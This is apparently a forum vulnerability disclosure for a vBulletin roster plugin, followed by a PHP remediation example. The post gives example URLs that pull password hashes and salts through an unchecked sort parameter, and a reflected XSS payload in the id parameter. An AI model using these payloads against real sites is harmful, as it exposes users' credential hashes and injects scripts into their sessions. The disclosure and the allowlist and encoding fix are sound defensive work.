vBulletin Customizable Roster Plugin – Data Extraction & XSS

Thread in the Web Vulnerabilities section, created by RaysMorgan on 10 Aug 2015. 1422 views

RaysMorgan (thread author), 10 Aug 2015
    Plugin: http://www.vbulletin.org/forum/showthread.php?t=235326

    Version: 4.0.10 (latest)

    vB version: 4.x.x

    #1 Data Extraction

    Vulnerable code in showroster.php:

    // ###GROUPCACHE#################################################################
    // $sortgroupfield and $sortuserfield come straight from the query string and are
    // used as column names of the $userinfo row, which holds the full user-table record.
    if ($userinfo['userid']) {
        $t = strtoupper($userinfo[$sortgroupfield]); // e.g. ?sortgroupfield=password
        $u = strtoupper($userinfo[$sortuserfield]);
        $groupcache["$t"]["$u"] = $userinfo;         // $t is later assigned to the showroster template
    }
    As you can see, the variable $t contains the $userinfo[$sortgroupfield] value. The $sortgroupfield value is retrieved from the URL, which can be changed by any user.
    Later on, the script iterates through the $groupcache array and assigns the variables to the showroster template.

    Now the problem here is that the $sortgroupfield variable is not sanitized or checked, and since the $userinfo variable contains all columns of the user table, we can extract any information about a given user by changing the URL to something like:
    http://example.com/showroster.php?or...field=password or
    http://example.com/showroster.php?or...roupfield=salt

    The only downside is that the user must be shown in the roster and that you can only extract one column at a time.

    Proof:
    http://example.com/showroster.php?or...field=password will show something like this

    #2 Cross Site Scripting

    The GET variable id is prone to XSS.

    Proof:
    http://example.com/showroster.php?order=asc&sortgroupfield=field1&id= "><script>alert("XSS")</script>

    This will alert "XSS" several times on the screen. Any type of HTML/JavaScript can be injected.
     
    10 Aug 2015, edited
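The fix a practitioner would apply to both issues, shown as an added example that is not part of RaysMorgan's post or of the plugin's code: the roster key computation from showroster.php next to a version that only accepts column names from an allowlist, and the raw reflection of id next to an HTML-encoded one. The $userinfo row is constructed sample data, and ROSTER_SORT_FIELDS, roster_key_vulnerable, roster_key_safe, id_attr_vulnerable and id_attr_safe are names assumed here, not names from the plugin.

```php
<?php
// Added example, not the plugin's own code. Demonstrates the unchecked column-name
// pattern from showroster.php and an allowlist-based replacement, plus HTML
// encoding of the reflected id parameter.

// Constructed stand-in for a row of the vBulletin user table as the roster sees it.
$userinfo = [
    'userid'    => 1,
    'username'  => 'alice',
    'usertitle' => 'Administrator',
    'password'  => 'deadbeef0123456789abcdef01234567', // constructed placeholder hash
    'salt'      => 'Xy9',
];

// Vulnerable: whatever column name arrives in the URL is used as-is.
// Equivalent to: $t = strtoupper($userinfo[$sortgroupfield]);
function roster_key_vulnerable(array $userinfo, string $sortgroupfield): string
{
    return strtoupper((string) ($userinfo[$sortgroupfield] ?? ''));
}

// Hardened: the request may only choose from an allowlist of columns that are
// meant to be public; anything else falls back to a default field.
const ROSTER_SORT_FIELDS = ['username', 'usertitle', 'joindate']; // assumed allowlist

function roster_key_safe(array $userinfo, string $requested, string $default = 'usertitle'): string
{
    $field = in_array($requested, ROSTER_SORT_FIELDS, true) ? $requested : $default;
    return strtoupper((string) ($userinfo[$field] ?? ''));
}

// XSS: the id parameter reflected into an attribute, raw versus encoded.
function id_attr_vulnerable(string $id): string
{
    // Raw reflection into the attribute, the pattern the advisory reports.
    return '<div id="' . $id . '">';
}

function id_attr_safe(string $id): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    return '<div id="' . htmlspecialchars($id, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Usage, simulating the query strings from the advisory.
$evil_field = 'password';
echo roster_key_vulnerable($userinfo, $evil_field), "\n"; // the hash ends up in the page
echo roster_key_safe($userinfo, $evil_field), "\n";       // request rejected, default field used

$evil_id = '"><script>alert("XSS")</script>';
echo id_attr_vulnerable($evil_id), "\n"; // attribute closed, script tag injected
echo id_attr_safe($evil_id), "\n";       // quotes and angle brackets encoded, stays inside the attribute
```

The allowlist is the important part: validating that $sortgroupfield "looks like a column name" is not enough, because password and salt are perfectly valid column names. Only columns the roster is supposed to display should be accepted, and the same applies to $sortuserfield.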